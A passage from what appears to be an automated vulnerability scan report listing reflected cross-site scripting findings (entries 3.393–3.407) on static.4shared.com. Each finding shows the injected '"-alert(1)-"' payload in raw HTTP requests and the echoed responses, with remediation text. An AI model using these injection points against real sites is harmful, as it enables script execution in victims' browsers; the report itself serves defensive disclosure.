Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/openid.css872dc&quot;-alert(1)-&quot;012793f9b37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=626301118D083DFBF62DC91BC8AAF9A1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/openid.css872dc"-alert(1)-"012793f9b37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.393. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5430c"-alert(1)-"af2ee37e7b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css5430c&quot;-alert(1)-&quot;af2ee37e7b0/pageDownload1/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B6094042F2C403249AB360C71A1BE8A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

3.394. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a9"-alert(1)-"beb8e3c777b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload16a0a9&quot;-alert(1)-&quot;beb8e3c777b/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85F1E680A4F8851A5E53D7C01D5CF5D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.395. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5cd"-alert(1)-"8d2149dd564 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/download.csscb5cd&quot;-alert(1)-&quot;8d2149dd564
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F366F4B86F7A2AFCA5A418971330D4EE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:24 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.396. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3c69"-alert(1)-"2cf4627ec1a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssf3c69&quot;-alert(1)-&quot;2cf4627ec1a/pageDownload1/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEFF1912BC6968ADA5A19D19FCFCF489.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:18 GMT
Content-Length: 36310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssf3c69"-alert(1)-"2cf4627ec1a/pageDownload1/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

3.397. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec9c"-alert(1)-"5240765fe67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1fec9c&quot;-alert(1)-&quot;5240765fe67/downloadWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F9F95CE1BFBC4C7B9EC88DA773F9FA0B.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:25 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1fec9c"-alert(1)-"5240765fe67/downloadWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

3.398. http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/downloadWithoutCommon.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47081"-alert(1)-"19897fe20e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload1/downloadWithoutCommon.css47081&quot;-alert(1)-&quot;19897fe20e2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A3449E686BCEAB24A694106C9996937F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:31 GMT
Content-Length: 36299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload1/downloadWithoutCommon.css47081"-alert(1)-"19897fe20e2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.399. http://static.4shared.com/css/tutorial.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa773"-alert(1)-"b1f17542dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssaa773"-alert(1)-"b1f17542dec/tutorial.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssaa773&quot;-alert(1)-&quot;b1f17542dec/tutorial.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=72479505BB09D25E8361A917AB871891.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:05 GMT
Content-Length: 36164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssaa773"-alert(1)-"b1f17542dec/tutorial.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.400. http://static.4shared.com/css/tutorial.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/tutorial.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd74e"-alert(1)-"6dad30ac8f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/tutorial.cssfd74e&quot;-alert(1)-&quot;6dad30ac8f9
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=93B8E7619EDD47EBB4FBE25560CB6C1A.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:09 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/tutorial.cssfd74e"-alert(1)-"6dad30ac8f9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.401. http://static.4shared.com/desktop/desktop.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f396c"-alert(1)-"7819c5badf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopf396c"-alert(1)-"7819c5badf/desktop.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktopf396c&quot;-alert(1)-&quot;7819c5badf/desktop.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C1A7BD0B0E6AF8E747AC2544F9A16C8.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:40 GMT
Content-Length: 36174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktopf396c"-alert(1)-"7819c5badf/desktop.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.402. http://static.4shared.com/desktop/desktop.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /desktop/desktop.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 630cd"-alert(1)-"d08d1566e98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktop/desktop.css630cd"-alert(1)-"d08d1566e98 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /desktop/desktop.css630cd&quot;-alert(1)-&quot;d08d1566e98
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA5872801E98E173BB61348634CE6CF6.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:45 GMT
Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/desktop/desktop.css630cd"-alert(1)-"d08d1566e98";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.403. http://static.4shared.com/dwr/engine.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7289a"-alert(1)-"da5431a7505 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr7289a"-alert(1)-"da5431a7505/engine.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwr7289a&quot;-alert(1)-&quot;da5431a7505/engine.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=00B3741014BF2AD0E8FF51C5BA549003.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:45 GMT
Content-Length: 36160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr7289a"-alert(1)-"da5431a7505/engine.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.404. http://static.4shared.com/dwr/engine.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/engine.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2dbcd"-alert(1)-"68c48b7d60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/2dbcd"-alert(1)-"68c48b7d60f?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DAAB3CF86EC0E243EFBD3B3398498731.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:49 GMT
Content-Length: 36115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/2dbcd"-alert(1)-"68c48b7d60f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

3.405. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecb97"-alert(1)-"81101aeb9ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /dwrecb97&quot;-alert(1)-&quot;81101aeb9ce/interface/DirChecks.js
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D64AD06194FD8CC93BD6BE654E5F064.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:42 GMT
Content-Length: 36225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwrecb97"-alert(1)-"81101aeb9ce/interface/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

3.406. http://static.4shared.com/dwr/interface/DirChecks.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /dwr/interface/DirChecks.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8499f"-alert(1)-"105b75277af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0465F93AE68A9307DB1F71E541F1FD88.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:46 GMT
Content-Length: 36214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/dwr/interface8499f"-alert(1)-"105b75277af/DirChecks.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

3.407. http://static.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
